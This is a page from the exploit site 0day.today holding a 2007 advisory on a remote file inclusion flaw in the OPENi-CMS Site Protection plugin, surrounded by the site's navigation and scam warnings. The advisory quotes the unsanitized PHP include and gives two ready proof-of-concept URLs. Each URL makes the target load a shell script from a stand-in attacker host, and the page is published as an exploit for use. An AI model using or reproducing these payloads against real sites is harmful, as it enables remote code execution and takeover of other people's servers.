0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
OPENi-CMS Site Protection Plugin Remote File Inclusion Vulnerability
==================================================================== OPENi-CMS Site Protection Plugin Remote File Inclusion Vulnerability ==================================================================== ------------------------------------------------------------------------------------ [ECHO_ADV_64$2007] Openi CMS plugins (site protection) remote file inclusion ------------------------------------------------------------------------------------ Author : Ahmad Muammar W.K (a.k.a) y3dips Date Found : February, 11 2007 Location : Indonesia, Jakarta Critical Lvl : Critical ------------------------------------------------------------------------------------ Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Internal range (site protection), version: 1.0 Openi CMS plugins (http://www.openi-cms.org) Description : With this Plugin you can release page ranges only for certain users. The user must authentifizieren itself with user name and password. Several users for a page range can be put on. Users and sides which can be protected are put on in the editorship environment by the administrator. --------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~~~ Variables "oi_dir" in index.php are not properly sanitized. ---------------index.php -------------------- ... <?PHP global $config; require_once($config["oi_dir"]."/base/sitemap_classes.php"); class plg_site_protection extends Plugin { ... ---------------------------------------------- An attacker can exploit this vulnerability with a simple php injection script. Poc/Exploit: ~~~~~~~~~~~~ http://target-openi/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=http://attacker/shell.php ? Notes: ~~~~~~ i have to change the variable "oi_dir" to "openi_dir" to get the cms works (config file), but then u just change the exploit to http://target-openi/open-admin/plugins/site_protection/index.php?config%5bopeni_dir%5d=http://attacker/shell.php? it doesnt matter coz the variable still unsanitized. --------------------------------------------------------------------------- Shoutz: ~~~~~~~ ~ my lovely ana ~ k-159 (never stop advising [pushing] me :P), the_day (echo young evil thinker), ~ and all echo staff # 0day.today [2024-12-25] #